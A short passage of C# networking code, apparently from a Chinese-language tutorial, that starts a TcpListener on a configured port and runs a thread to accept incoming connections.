// addresses, so the listener shows up as a wildcard-bound socket in the host's listening-port table.
BD.Lis = new TcpListener(Globle.Lis_Port);
BD.Lis.Start();
// Accept connections for as long as Globle._IsListen_Port stays true
Thread thread_Lis_MySelf = new Thread(new ThreadStart(BD.Listen_Port));
thread_Lis_MySelf.Start();
這樣就啟動了。